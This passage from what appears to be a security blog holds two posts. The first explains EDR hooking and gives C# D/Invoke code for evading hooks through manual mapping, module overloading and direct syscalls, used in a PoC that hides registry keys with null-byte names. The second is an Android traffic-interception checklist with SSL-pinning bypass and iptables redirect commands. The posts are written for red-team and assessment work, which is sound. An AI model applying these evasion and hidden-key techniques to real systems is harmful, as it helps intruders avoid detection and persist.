The process of leveraging these API functions in C# is dubbed Platform Invoking (P/Invoke for short). Microsoft made this possible thanks to the System.Runtime.InteropServices namespace in C#, all of which is “managed” by the CLR (Common Language Runtime). The graphic below shows how, using P/Invoke, you can bridge the gap between unmanaged and managed code.

Consuming Unmanaged DLL Functions | Microsoft Docs
How P/Invoke bridges the gap between managed and unmanaged code.
source – https://docs.microsoft.com/en-us/dotnet/framework/interop/consuming-unmanaged-dll-functions
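As an aside, this managed-to-native bridge is not unique to .NET. Here is a small Python/ctypes sketch of the same idea (illustration only; the library and function below are not part of this post's PoC, and CDLL(None) works on Linux/macOS, not Windows):

```python
import ctypes

# Load the C runtime's symbols; this plays the role of the native DLL on the
# unmanaged side of the bridge. On Windows you would load a DLL explicitly,
# e.g. ctypes.WinDLL("user32").
libc = ctypes.CDLL(None)

# Declaring argument/return types up front is the ctypes equivalent of a
# [DllImport] prototype: it tells the runtime how to marshal values across
# the managed/unmanaged boundary.
libc.abs.argtypes = [ctypes.c_int]
libc.abs.restype = ctypes.c_int

print(libc.abs(-42))  # prints 42: interpreted code calling straight into native code
```

The point is the same as in the diagram above: the runtime sits between your code and the native function and handles the marshalling.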

There is an operational (from an offensive point of view) drawback to leveraging .NET as well, however. Since the CLR is responsible for the translation between .NET to machine-readable code, the executable is not directly translated into this code. This means that the executable stores its entire codebase in the assembly, and is thus very easily reverse-engineered.

On top of assemblies being easily reverse engineered, we are also moving more and more into an EDR (Endpoint Detection and Response) world. Organizations around the globe are (thankfully) increasing their (cyber)security posture, making the lives of operators harder. As cybersecurity consultants, it is our job to help organizations do exactly that, so we are glad to see things moving in the right direction.

EDRs catch offensive tradecraft, even when executed in memory (without touching disk, commonly referred to as “fileless”), by hooking into processes and subverting their execution on certain functions. This allows the EDR to inspect what is happening; if it likes what it sees, the EDR will let the function call pass and normal execution of the program resumes. @CCob posted a very nice blog post series about this concept and how to bypass the hooks. A good EDR will hook at the lowest level possible, which is ntdll.dll (the DLL responsible for making system calls to the Windows kernel). The image below is a good example of how EDRs can work.

EDR Observations | RE & Sec Blog
how EDR’s can hook ntdll calls to prevent malware execution
source – http://christopher-vella.com/2020/08/21/EDR-Observations.html

There are two main methods an EDR uses to do its hooking, ironically, this is also how most rootkits operate: IAT hooking and Inline hooking (also known as splicing).

IAT stands for Import Address Table. You could compare the IAT to a phone book: every executable has one, in which it can look up the numbers of its friends (the functions it needs).
This phone book can be tampered with: an EDR could change an entry to point to itself. Below you can see a diagram of how IAT hooking could work.
In order for this diagram to make sense, you’ll have to think of the EDR as the “malicious code”:

In this example, a program wants to call a message box, so it looks up the message box’s number (address) in its phone book.
Little does the program know that someone has replaced the phone number (address), so whenever it calls the message box, it actually calls the EDR instead!
The EDR will pick up the phone, listen to the message (function call), and if it likes the message, tell the program the real phone number of the message box so the program can call it.
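The phone-book swap can be sketched in a few lines of Python (a purely conceptual toy: a real IAT lives in the PE headers, not in a dictionary, and the names below are made up):

```python
# Toy illustration of IAT hooking: the "phone book" maps function names to
# function pointers, and the hook replaces an entry so calls detour through it.
import_address_table = {}

def message_box(text):
    # The real imported function.
    return f"MessageBox: {text}"

def edr_hook(text):
    # The "EDR" inspects the call first; if it likes what it sees,
    # it forwards the call to the real function.
    if "malware" in text:
        return "blocked!"
    return message_box(text)

# The program writes down its friend's number...
import_address_table["MessageBox"] = message_box
# ...but the EDR swaps the entry so every call goes through it first.
import_address_table["MessageBox"] = edr_hook

print(import_address_table["MessageBox"]("hello"))    # MessageBox: hello
print(import_address_table["MessageBox"]("malware"))  # blocked!
```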

Inline hooking could be compared with an intruder holding a gun to the head of the friend our program wants to call.

splicing illustration courtesy of “Learning malware Analysis” by Monnapa K A

With inline hooking, the program has the correct number (address) of its friend (function). The program will call its friend, and its friend will answer the call.
Little does the program know that its friend has been taken hostage and the call is on speaker. The intruder tells the friend to say a certain phrase (execute some instructions) and afterwards to resume the conversation as if nothing happened.

These two methods can cause serious issues for operators (in the case of defensive hooks) and defenders (in the case of offensive hooks).
From an offensive perspective, there are some bypasses you can leverage to get around these function hooks: FireWalker by MDSec comes to mind, as does SharpBlock by @CCob. Or, the ultimate bypass: use system calls directly.

Another interesting project is SharpSploit, which aims to be a library facilitating offensive C# tradecraft, much like PowerSploit was for PowerShell back in the day. The downside of SharpSploit, however, is that the compiled DLL is considered malicious, so if you use SharpSploit as a dependency for your program, you’ll immediately be flagged by AV.
Part of SharpSploit, however, is dynamic invocation (also known as D/Invoke). This is (in my opinion) the most interesting part of the entire SharpSploit suite. It allows operators to invoke the APIs leveraged by P/Invoke, but instead of using static imports, it resolves them dynamically! This means IAT hooking is completely bypassed, since dynamically invoked functions do not create an entry in the executable’s import table. As a result, analysts and EDRs alike will not be able to tell what your majestic program does just by looking at its import table. TheWover wrote a very nice blog post about it; I highly recommend reading it.

Additionally, TheWover released a NuGet package, and what is great about it is that it can be used directly as a library and is NOT considered malicious. It also contains structures and functions that would otherwise have to be defined manually by the programmer. If this does not make sense to you right now, allow me to illustrate with an example I created a few days ago:

Then, I recreated the same PoC, with the NuGet

The codebase shrank from 731 lines of code to just 38. That is what makes the D/Invoke NuGet the best invention ever for offensive .NET development.
The NuGet is still a work in progress, but its ultimate goal is to be a full replacement for P/Invoke. If you want to help out, feel free to submit a pull request!

I’m confident that this library can become very big, through the power of open source!

Leveraging D/Invoke to bypass hooks and the revival of the invisible reg key.

Now that the concepts of hooking and dynamic invocation are clear, we can dive into bypassing hooks using D/Invoke.
For inspiration and to make this blog post useful, I’ve decided to create a proof of concept based on some old research from the folks over at Specterops.
In their research, they took even older research by Mark Russinovich and turned it into an offensive proof of concept. Mark released a tool called RegHide back in 2005.
He discovered that you could prepend a null byte to the key name when creating a new registry key using NtCreateKey. Anything that parses the name as a C string treats that null byte as a string terminator (in C, strings are terminated with a null byte). As a result, the registry accepts the new key but cannot display it properly, which already gives defenders a nice indication that something is definitely fishy.

Image for post
Regedit will show an error when trying to display a key value with a null character in its name.
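The truncation itself is plain C string semantics, which a couple of lines of Python can demonstrate (a sketch of the string-termination behaviour only; the key name is an example, and the NtCreateKey call itself is not reproduced here):

```python
import ctypes

# A C string stops at the first NUL byte. The kernel stores the full
# (counted) key name, but any tool that reads the name as a C string,
# like Regedit, stops at the NUL and sees an "empty" or truncated name.
raw_name = b"\x00HiddenKey"
print(ctypes.c_char_p(raw_name).value)        # b'' -- the name looks empty
print(ctypes.c_char_p(b"abc\x00def").value)   # b'abc' -- truncated at the NUL
```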

In my proof of concept, I ported their PowerShell to C#, leveraging the power of D/Invoke and its NuGet.
I’ve submitted a pull request to the D/Invoke project, adding all the necessary structures and delegates (along with some others, such as QueueUserAPC process injection).
However, as I wanted to publish this blog post already, I also coded the necessary structs into my PoC itself, making it compatible with the current NuGet package of D/Invoke.
The PoC can be found here:

usage of the PoC – DinvisbleRegistry

There are three methods of invocation coded into the PoC. All methods are fully implemented, even though they could have been merged into one big function.
The reason I took the time to write the code out in full is that I wanted to show the different approaches an operator can take to leverage D/Invoke to bypass hooking. 

Method 1: “classic” dynamic invoke.

When specifying the -n flag and all other required parameters, the PoC will create a new registry key (hidden, if you use the -h flag) in the requested hive using the traditional D/Invoke methodology.
This method bypasses IAT hooking, as the functions are called dynamically and thus do not show up in the IAT.

D/Invoke works like this: you first create the signature of the API call you are trying to make (unless it’s already in the D/Invoke NuGet) and the corresponding delegate function:

API signature

public static DInvoke.Data.Native.NTSTATUS NtOpenKey(
    ref IntPtr keyHandle,
    uint desiredAccess,
    ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes)
{
    object[] funcargs = { keyHandle, desiredAccess, objectAttributes };
    DInvoke.Data.Native.NTSTATUS retvalue = (DInvoke.Data.Native.NTSTATUS)DInvoke.DynamicInvoke.Generic.DynamicAPIInvoke(@"ntdll.dll", @"NtOpenKey", typeof(DELEGATES.NtOpenKey), ref funcargs);
    keyHandle = (IntPtr)funcargs[0];
    return retvalue;
}

Corresponding delegate:

public delegate DInvoke.Data.Native.NTSTATUS NtOpenKey(
    ref IntPtr keyHandle,
    uint desiredAccess,
    ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes);

As you can see in the API signature, you are calling the DynamicAPIInvoke function and passing it the delegate of the function.

Method 2: “Manual Mapping”

A trick some threat actors and malware strains use is the concept of manual mapping. TheWover explains manual mapping in his blog post as follows:

DInvoke supports manual mapping of PE modules, stored either on disk or in memory. This capability can be used either for bypassing API hooking or simply to load and execute payloads from memory without touching disk. The module may either be mapped into dynamically allocated memory or into memory backed by an arbitrary file on disk. When a module is manually mapped from disk, a fresh copy of it is used. That way, any hooks that AV/EDR would normally place within it will not be present. If the manually mapped module makes calls into other modules that are hooked, then AV/EDR may still trigger. But at least all calls into the manually mapped module itself will not be caught in any hooks. This is why malware often manually maps ntdll.dll. They use a fresh copy to bypass any hooks placed within the original copy of ntdll.dll loaded into the process when it was created, and force themselves to only use Nt* API calls located within that fresh copy of ntdll.dll. Since the Nt* API calls in ntdll.dll are merely wrappers for syscalls, any call into them will not inadvertently jump into other modules that may have hooks in place

Manual mapping is done in the PoC when you specify the -m flag, and the code looks like this:

First, map the library you are using. The lower you go, the less chance of hooks further down the call tree; whenever you can, use ntdll.dll.

DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = DInvoke.ManualMap.Map.MapModuleToMemory(@"C:\Windows\System32\ntdll.dll");

Next, create the delegate for the function you are trying to call if it is not yet in D/Invoke; otherwise, you can just leverage the NuGet.

public delegate DInvoke.Data.Native.NTSTATUS NtOpenKey(
    ref IntPtr keyHandle,
    uint desiredAccess,
    ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes);

Next, create your function parameters and an array to store them in:

IntPtr keyHandle = IntPtr.Zero;
// oaObjectName and desiredAccess are prepared earlier in the PoC
STRUCTS.OBJECT_ATTRIBUTES oa = new STRUCTS.OBJECT_ATTRIBUTES();
oa.Length = Marshal.SizeOf(oa);
oa.Attributes = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE;
oa.objectName = oaObjectName;
oa.SecurityDescriptor = IntPtr.Zero;
oa.SecurityQualityOfService = IntPtr.Zero;
DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS();
object[] ntOpenKeyParams = { keyHandle, desiredAccess, oa };

Finally, call D/Invoke’s CallMappedDLLModuleExport to call the function from the manually mapped DLL:

retValue = (DInvoke.Data.Native.NTSTATUS)DInvoke.DynamicInvoke.Generic.CallMappedDLLModuleExport(mappedDLL.PEINFO, mappedDLL.ModuleBase, "NtOpenKey", typeof(DELEGATES.NtOpenKey), ntOpenKeyParams, false);

In the case of ntdll.dll, the last parameter of CallMappedDLLModuleExport is false, because ntdll does not have a DllMain method. Setting it to true would crash the program, as you would be trying to access memory that does not exist.

Method 3: OverloadMapping (my personal favorite)

TheWover explains Module Overloading as follows:

In addition to normal manual mapping, we also added support for Module Overloading. Module Overloading allows you to store a payload in memory (in a byte array) into memory backed by a legitimate file on disk. That way, when you execute code from it, the code will appear to execute from a legitimate, validly signed DLL on disk.
A word of caution: manual mapping is complex and we do not guarantee that our implementation covers every edge case. The version we have implemented now is serviceable for many common use cases and will be improved upon over time. Additionally, manual mapping and syscall stub generation do not currently work in WOW64 processes.

Methods 2 and 3 are largely the same in implementation; the only difference is that you call the overload mapping method, and you no longer have to map the module to memory yourself:

DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = DInvoke.ManualMap.Overload.OverloadModule(@"C:\Windows\System32\ntdll.dll");

The rest of the implementation remains the same as in method 2.

If you want to see which decoy module got used, you can retrieve it through the PE_MANUAL_MAP’s DecoyModule field:

Console.WriteLine("Decoy module is found!\n Using: {0} as a decoy", mappedDLL.DecoyModule);

Method 4: System calls

Disclaimer: This method is currently a bit “broken”; as a result, you might not experience the result you are looking for. This is also the reason why this method is currently NOT implemented in the PoC. I would advise not using this method until a later release of D/Invoke.

D/Invoke has provided an API to dynamically get system calls as well. The steps to generate system calls are explained next.

Create your delegate (should it not already exist):

public delegate DInvoke.Data.Native.NTSTATUS NtOpenKey(
    ref IntPtr keyHandle,
    uint desiredAccess,
    ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes);

Create an IntPtr to store your syscall pointer and fill it in using the GetSyscallStub function:

IntPtr syscall = IntPtr.Zero;
syscall = DInvoke.DynamicInvoke.Generic.GetSyscallStub("NtOpenKey");

Create a delegate of the call you want to make that uses the syscall, through the use of our dear friend Marshal:

DELEGATES.NtOpenKey syscallNtOpenKey = (DELEGATES.NtOpenKey)Marshal.GetDelegateForFunctionPointer(syscall, typeof(DELEGATES.NtOpenKey));

Finally, make the call 🙂

retValue = syscallNtOpenKey(ref keyHandle, desiredAccess, ref oa);


I hope this blog post has shed some light on the different approaches an operator can take to bypass EDR hooks, both IAT and inline.
Feel free to contribute to the D/Invoke project by submitting a pull request! We will greatly appreciate your efforts! The D/Invoke GitHub project can be found here:
The proof of concept can be found here:

About the author

Jean-François Maes is a red teaming and social engineering expert working in the NVISO Cyber Resilience team. 
When he is not working, you can probably find Jean-François in the Gym or conducting research.
Apart from his work with NVISO, he is also the creator of redteamer.tips, a website dedicated to help red teamers.
Jean-François is currently also in the process of becoming a SANS instructor for the SANS SEC699: Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection course.
He was also ranked #1 on the Belgian leaderboard of Hack The Box (a popular penetration testing platform).
You can find Jean-François on LinkedIn, Twitter, GitHub and on Hack The Box.

Proxying Android app traffic – Common issues / checklist

19 November 2020 at 09:52

During a mobile assessment, there will typically be two sub-assessments: the mobile frontend and the backend API. In order to examine the security of the API, you will either need extensive documentation such as Swagger or Postman files, or you can let the mobile application generate all the traffic for you and simply intercept and modify that traffic through a proxy (MitM attack).

Sometimes it’s really easy to get your proxy set up. Other times, it can be very difficult and time consuming. During many engagements, I have seen myself go over this ‘sanity checklist’ to figure out which step went wrong, so I wanted to write it down and share it with everyone.

In this guide, I will use PortSwigger’s Burp Suite proxy, but the same steps can of course be used with any HTTP proxy. The proxy will be listening on port 8080 in all the examples. The checks start very basic, but ramp up towards the end.


Update: Sven Schleier also created a blogpost on this with some awesome visuals and graphs, so check that out as well!

Setting up the device

First, we need to make sure everything is set up correctly on the device. These steps apply regardless of the application you’re trying to MitM.

Is your proxy configured on the device?

An obvious first step is to configure a proxy on the device. The UI changes a bit depending on your Android version, but it shouldn’t be too hard to find.

Sanity check
Go to Settings > Connections > Wi-Fi, select the Wi-Fi network that you’re on, click Advanced > Proxy > Manual and enter your Proxy details:

Proxy host name:
Proxy port: 8080

Is Burp listening on all interfaces?

By default, Burp only listens on the local interface, but since we want to connect from a different device, Burp needs to listen on the specific interface that has joined the Wi-Fi network. You can either listen on all interfaces, or listen on a specific interface if you know which one you want. As a sanity check, I usually go for ‘listen on all interfaces’. Note that Burp has an API which may allow other people on the same Wi-Fi network to query your proxy and retrieve information from it.

Sanity check
Navigate to http://<your-lan-ip>:8080 on your host computer. The Burp welcome screen should come up.

In Burp, go to Proxy > Options > Click your proxy in the Proxy Listeners window > check ‘All interfaces’ on the Bind to Address configuration

Can your device connect to your proxy?

Some networks have host/client isolation and won’t allow clients to talk to each other. In this case, your device won’t be able to connect to the proxy since the router doesn’t allow it.

Sanity Check
Open a browser on the device and navigate to your proxy’s address (http://<your-lan-ip>:8080). You should see Burp’s welcome screen. You should also be able to navigate to http://burp in case you’ve already configured the proxy in the previous check.

There are a few options here:

  • Set up a custom wireless network where host/client isolation is disabled
  • Host your proxy on a device that is accessible, for example an AWS ec2 instance
  • Perform an ARP spoofing attack to trick the mobile device into believing you are the router
  • Use adb reverse to proxy your traffic over a USB cable:
    • Configure the proxy on your device to go to 127.0.0.1 on port 8080
    • Connect your device over USB and make sure that adb devices shows your device
    • Execute adb reverse tcp:8080 tcp:8080 which sends all traffic received on <device>:8080 to <host>:8080
    • At this point, you should be able to browse to http://127.0.0.1:8080 on the device and see Burp’s welcome screen

Can you proxy HTTP traffic?

The steps for HTTP traffic are typically much easier than HTTPS traffic, so a quick sanity check here makes sure that your proxy is set up correctly and reachable by the device.

Sanity check
Navigate to http://neverssl.com and make sure you see the request in Burp. Neverssl.com is a website that doesn’t use HSTS and will never send you to an HTTPS version, making it a perfect test for plaintext traffic.


If the request doesn’t show up, check the following:

  • Go over the previous checks again; something may be wrong
  • Burp’s Intercept may be enabled, leaving the request waiting for your approval

Is your Burp certificate installed on the device?

In order to intercept HTTPS traffic, your proxy’s certificate needs to be installed on the device.

Sanity check
Go to Settings > Security > Trusted credentials > User and make sure your certificate is listed. Alternatively, you can try intercepting HTTPS traffic from the device’s browser.

This is documented in many places, but here’s a quick rundown:

  • Navigate to http://burp in your browser
  • Click the ‘CA Certificate’ in the top right; a download will start
  • Use adb or a file manager to change the extension from der to crt
    • adb shell mv /sdcard/Download/cacert.der /sdcard/Download/cacert.crt
  • Navigate to the file using your file manager and open the file to start the installation
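If you want to sanity-check the exported certificate before installing it, openssl can inspect and convert it. A minimal sketch, using a throwaway self-signed certificate as a stand-in for Burp’s exported cacert.der (all file names are illustrative):

```shell
# Throwaway self-signed cert in DER form, standing in for Burp's cacert.der.
openssl req -x509 -newkey rsa:2048 -nodes -keyout /tmp/burptest.key \
  -subj "/CN=Throwaway Test CA" -days 30 -outform DER -out /tmp/burptest.der

# Confirm the DER file really is a certificate, and print its subject.
openssl x509 -inform DER -in /tmp/burptest.der -noout -subject

# Renaming .der to .crt is enough for the Android installer, but you can
# also convert to PEM explicitly if some tool insists on it:
openssl x509 -inform DER -in /tmp/burptest.der -out /tmp/burptest.crt
```

The same `openssl x509` inspection works on the real cacert.der you downloaded from http://burp.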

Is your Burp certificate installed as a root certificate?

Applications on more recent versions of Android don’t trust user certificates by default. A more thorough writeup is available in another blogpost. Alternatively, you can repackage applications to add the relevant controls to the network_security_config.xml file, but having your root CA in the system CA store will save you headaches in other steps (such as third-party frameworks), so it’s my preferred method.

Sanity check
Go to Settings > Security > Trusted credentials > System and make sure your certificate is listed.

In order to get your certificate listed as a root certificate, your device needs to be rooted with Magisk.

  • Install the certificate as a user certificate as normal (see previous check)
  • Install the MagiskTrustUser module
  • Restart your device to enable the module
  • Restart a second time to trigger the file copy

Alternatively, you can:

  • Make sure the certificate is in the correct format and copy/paste it to the /system/etc/security/cacerts directory yourself. However, for this to work, your /system partition needs to be writable. Some rooting methods allow this, but it’s very dirty and Magisk is just so much nicer. It’s also a bit tedious to get the certificate in the correct format.
  • Modify the networkSecurityConfig to include user certificates as trust anchors (see further down below). It’s much nicer to have your certificate as a system certificate though, so I rarely take this approach.
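For the manual copy approach, the “correct format” is a PEM file named after the certificate’s old-style OpenSSL subject hash, with a .0 extension. A sketch of how to produce such a file, using a throwaway CA as a stand-in for your Burp CA (paths are illustrative):

```shell
# Throwaway CA standing in for your Burp root CA.
openssl req -x509 -newkey rsa:2048 -nodes -keyout /tmp/sysca.key \
  -subj "/CN=Throwaway Test CA" -days 30 -out /tmp/sysca.pem

# Android's system store expects PEM files named <subject_hash_old>.0
HASH=$(openssl x509 -in /tmp/sysca.pem -noout -subject_hash_old)
cp /tmp/sysca.pem "/tmp/$HASH.0"
echo "system store file name: $HASH.0"

# With a writable /system partition you would then push it:
# adb push /tmp/$HASH.0 /system/etc/security/cacerts/
```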

Does your Burp certificate have an appropriate lifetime?

Google (and thus Android) is aggressively shortening the maximum accepted lifetime of leaf certificates. If your leaf certificate’s expiration date is too far ahead in the future, Android/Chrome will not accept it. More information can be found in this blogpost.

Sanity check
Connect to your proxy using a browser and investigate the certificate lifetime of both the root CA and the leaf certificate. If they’re shorter than 1 year, you’re good to go. If they’re longer, I like to play it safe and create a new CA. You can also use the latest version of the Chrome browser on Android to validate your certificate lifetime. If something’s wrong, Chrome will display the following error: ERR_CERT_VALIDITY_TOO_LONG

There are two possible solutions here:

  • Make sure you have the latest version of Burp installed, which reduces the lifetime of generated leaf certificates
  • Make your own root CA that’s only valid for 365 days. Certificates generated by this root CA will also be shorter than 365 days. This is my preferred option, since the certificate can be shared with team members and be installed on all devices used during engagements.
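Creating such a short-lived CA can be sketched with openssl as follows; the file names and subject are illustrative, and `-checkend` is used to verify the resulting lifetime:

```shell
# Root CA valid for exactly 365 days.
openssl req -x509 -newkey rsa:2048 -nodes -keyout /tmp/shortca.key \
  -subj "/CN=My Short-Lived Root CA" -days 365 -out /tmp/shortca.pem

# Inspect the validity window.
openssl x509 -in /tmp/shortca.pem -noout -dates

# -checkend exits 0 if the cert is still valid N seconds from now:
# valid at +364 days, expired at +366 days, so the lifetime is as intended.
openssl x509 -in /tmp/shortca.pem -noout -checkend $((364*24*3600)) \
  && echo "still valid in 364 days"
openssl x509 -in /tmp/shortca.pem -noout -checkend $((366*24*3600)) \
  || echo "expired in 366 days: lifetime is short enough"
```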

Setting up the application

Now that the device is ready to go, it’s time to take a look at application specifics.

Is the application proxy aware?

Many applications simply ignore the proxy settings of the system. Applications that use standard libraries will typically use the system proxy settings, but applications that rely on an interpreted runtime (such as Xamarin and Unity) or are compiled natively (such as Flutter) usually require the developer to explicitly program proxy support into the application.

Sanity check
When running the application, you should either see your HTTPS data in Burp’s Proxy tab, or you should see HTTPS connection errors in Burp’s Event log on the Dashboard panel. Since the entire device is proxied, you will see many blocked requests from applications that use SSL Pinning (e.g. Google Play), so see if you can find a domain that is related to the application. If you don’t see any relevant failed connections, your application is most likely proxy unaware.

As an additional sanity check, you can see if the application uses a third party framework. If the app is written in Flutter it will definitely be proxy unaware, while if it’s written in Xamarin or Unity, there’s a good chance it will ignore the system’s proxy settings.

  • Decompile with apktool
    • apktool d myapp.apk
  • Go through known locations
    • Flutter: myapp/lib/arm64-v8a/libflutter.so
    • Xamarin: myapp/unknown/assemblies/Mono.Android.dll
    • Unity: myapp/lib/arm64-v8a/libunity.so
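These file checks can be scripted. A rough sketch below: the detect_framework helper is hypothetical, a dummy directory stands in for real apktool output, and real apps may ship other ABI directories (such as armeabi-v7a) as well:

```shell
# Dummy "decompiled app" directory standing in for real apktool output.
APP_DIR=/tmp/myapp
mkdir -p "$APP_DIR/lib/arm64-v8a"
touch "$APP_DIR/lib/arm64-v8a/libflutter.so"

# Hypothetical helper: report which framework marker files are present.
detect_framework() {
  dir="$1"
  [ -e "$dir/lib/arm64-v8a/libflutter.so" ] && echo "Flutter"
  [ -e "$dir/unknown/assemblies/Mono.Android.dll" ] && echo "Xamarin"
  [ -e "$dir/lib/arm64-v8a/libunity.so" ] && echo "Unity"
  return 0
}

detect_framework "$APP_DIR" | tee /tmp/framework.txt
```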

There are a few things to try:

  • Use ProxyDroid (root only). Although it’s an old app, it still works really well. ProxyDroid uses iptables in order to forcefully redirect traffic to your proxy
  • Set up a custom hotspot through a second wireless interface and use iptables to redirect traffic yourself. You can find the setup on the mitmproxy documentation, which is another useful HTTP proxy. The exact same setup works with Burp.

In both cases, you have moved from a ‘proxy aware’ to a ‘transparent proxy’ setup. There are two things you must do:

  • Disable the proxy on your device. If you don’t do this, Burp will receive both proxied and transparent requests, which are not compatible with each other.
  • Configure Burp to support transparent proxying via Proxy > Options > active proxy > edit > Request Handling > Support invisible proxying

Perform the sanity check again to now hopefully see SSL errors in Burp’s event log.

Is the application using custom ports?

This only really applies if your application is not proxy aware. In that case, you (or ProxyDroid) will be using iptables to intercept traffic, but these iptables rules only target specific ports. In the ProxyDroid source code, you can see that only ports 80 (HTTP) and 443 (HTTPS) are targeted. If the application uses a non-standard port (for example 8443 or 8080), it won’t be intercepted.

Sanity check
This one is a bit more tricky. We need to find traffic that is leaving the application that isn’t going to ports 80 or 443. The best way to do this is to listen for all traffic leaving the application. We can do this using tcpdump on the device, or on the host machine in case you are working with a second Wi-Fi hotspot.

Run the following command on an adb shell with root privileges:

tcpdump -i wlan0 -n -s0 -v

You will see many different connections. Ideally, you should start the command, open the app and stop tcpdump as soon as you know the application has made some requests. After some time, you will see connections to a remote host on a non-default port. In the example below, there are multiple connections to a remote host on port 8088:

Alternatively, you can write the output of tcpdump to a pcap file using tcpdump -i wlan0 -n -s0 -w /sdcard/output.pcap. After retrieving the output.pcap file from the device, it can be opened with Wireshark and inspected:


If your application is indeed proxy unaware and communicating over custom ports, ProxyDroid won’t be able to help you. ProxyDroid doesn’t allow you to add custom ports, though it is an open-source project and a PR for this would be great 😉. This means you’ll have to use iptables manually.

  • Either you set up a second hotspot where your host machine acts as the router, and you can thus perform a MitM
  • Or you use ARP spoofing to perform an active MitM between the router and the device
  • Or you can use iptables yourself and forward all the traffic to Burp. Since Burp is listening on a separate host, the nicest solution is to use adb reverse to map a port on the device to your Burp instance. This way you don’t need to set up a separate hotspot, you just need to connect your device over USB.
    • On host: adb reverse tcp:8080 tcp:8080
    • On device, as root: iptables -t nat -A OUTPUT -p tcp -m tcp --dport 8088 -j REDIRECT --to-ports 8080

Is the application using SSL pinning?

At this point, you should be getting HTTPS connection failures in Burp’s Event log on the Dashboard. The next step is to verify if SSL pinning is used, and disable it. Although many Frida scripts claim to be universal SSL pinning bypasses, there isn’t a single one that even comes close. Android applications can be written in many different technologies, and only a few of those technologies are typically supported. Below you can find various ways in which SSL pinning may be implemented, and ways to get around it.

Note that some applications have multiple ways to pin a specific domain, and you may have to combine scripts in order to disable all of the SSL pinning.

Pinning through android:networkSecurityConfig

Android allows applications to perform SSL pinning by using the network_security_config.xml file. This file is referenced in the AndroidManifest.xml and is located in res/xml/. The name is usually network_security_config.xml, but it doesn’t have to be. As an example, the Microsoft Authenticator app has the following two pins defined:

Use any of the normal universal bypass scripts:

  • Run Objection and execute the android sslpinning disable command
  • Use Frida codeshare: frida -U --codeshare akabe1/frida-multiple-unpinning -f be.nviso.app
  • Remove the networkSecurityConfig setting in the AndroidManifest by using apktool d and apktool b. It’s usually much faster to do it through Frida, so this is only rarely needed.

Pinning through OkHttp

Another popular way of pinning domains is through the OkHttp library. You can do a quick validation by grepping for OkHttp and/or sha256. You will most likely find references (or even hashes) relating to OkHttp and whatever is being pinned:
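For reference, the sha256 values you find this way are OkHttp pins: base64-encoded SHA-256 hashes of a certificate’s SubjectPublicKeyInfo. You can compute the pin for any certificate yourself; a sketch using a throwaway certificate as a stand-in for the real server certificate (file names are illustrative):

```shell
# Throwaway certificate standing in for the real server certificate.
openssl req -x509 -newkey rsa:2048 -nodes -keyout /tmp/pin.key \
  -subj "/CN=api.example.com" -days 30 -out /tmp/pin.pem

# Pin = base64( SHA-256( DER-encoded SubjectPublicKeyInfo ) )
PIN=$(openssl x509 -in /tmp/pin.pem -pubkey -noout \
  | openssl pkey -pubin -outform DER \
  | openssl dgst -sha256 -binary \
  | openssl base64)
echo "sha256/$PIN" | tee /tmp/pin.txt
```

Running this against the certificate a server actually presents lets you confirm which pin in the decompiled app corresponds to which host.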

Use any of the normal universal bypass scripts:

  • Run Objection and execute the android sslpinning disable command
  • Use Frida codeshare: frida -U --codeshare akabe1/frida-multiple-unpinning -f be.nviso.app
  • Decompile the apk using apktool, and modify the pinned domains. By default, OkHttp will allow connections that are not specifically pinned. So if you can find and modify the domain name that is pinned, the pinning will be disabled. Using Frida is much faster though, so this approach is rarely taken.

Pinning through OkHttp in obfuscated apps

Universal pinning scripts may work on obfuscated applications, since they hook Android system libraries which can’t be obfuscated. However, if an application is using something other than a default Android library, the classes will be obfuscated and the scripts will fail to find the correct classes. A good example of this is OkHttp. When an application is using OkHttp and has been obfuscated, you’ll have to figure out the obfuscated name of the CertificatePinner.Builder class. You can see below that obfuscated OkHttp was used by searching for the same sha256 string. This time, you won’t see nice OkHttp class references, but you will typically still find string references and maybe some package names as well. This depends on the level of obfuscation, of course.

You’ll have to write your own Frida script to hook the obfuscated version of the CertificatePinner.Builder class. I have written down the steps to easily find the correct method, and create a custom Frida script in this blogpost.

Pinning through various libraries

Instead of using the networkSecurityConfig or OkHttp, developers can also perform SSL pinning using many different standard Java classes or imported libraries. Additionally, some Java-based third-party app frameworks such as PhoneGap or Appcelerator provide specific functions to the developer to add pinning to the application.

There are many ways to do this programmatically, so your best bet is to try various anti-pinning scripts and at least figure out what kind of methods are being triggered. That gives you information on the app, after which you can further reverse-engineer it to figure out why interception isn’t working yet.

Try as many SSL pinning bypass scripts as you can find, and monitor their output. If you can identify certain classes or frameworks that are used, this will help you in creating your own custom SSL pinning bypasses specific to the application.

Pinning in third party app frameworks

Third party app frameworks will have their own low-level implementation for TLS and HTTP and default pinning bypass scripts won’t work. If the app is written in Flutter, Xamarin or Unity, you’ll need to do some manual reverse engineering.

Figuring out if a third party app framework is used
As mentioned in a previous step, the following files are giveaways for either Flutter, Xamarin or Unity:

  • Flutter: myapp/lib/arm64-v8a/libflutter.so
  • Xamarin: myapp/unknown/assemblies/Mono.Android.dll
  • Unity: myapp/lib/arm64-v8a/libunity.so

Pinning in Flutter applications

Flutter is proxy-unaware and doesn’t use the system’s CA store. Every Flutter app contains a full copy of trusted CAs which is used to validate connections. So while it most likely isn’t performing SSL pinning, it still won’t trust the root CAs on your device and thus interception will not be possible. More information is available in the blogposts mentioned below.

Follow my blog posts on intercepting Flutter traffic for either ARMv7 (32-bit) or ARM64 (64-bit).

Pinning in Xamarin and Unity applications

Xamarin/Unity applications usually aren’t too difficult, but they do require manual reverse engineering and patching. Xamarin/Unity applications contain .dll files in the assemblies/ folder and these can be opened using .NET decompilers. My favorite tool is dnSpy, which also allows you to modify the .dll files.

No blog post on this yet, sorry 😉. The steps are as follows:

  • Extract apk using apktool and locate .dll files
  • Open .dll files using dnSpy and locate the HTTP pinning logic
  • Modify logic either by modifying the C# code or the IL
  • Save the modified module
  • Overwrite the .dll file with the modified version
  • Repackage and resign the application
  • Reinstall the application and run

What if you still can’t intercept traffic?

It’s definitely possible that after all of these steps, you still won’t be able to intercept all the traffic. The typical culprits:

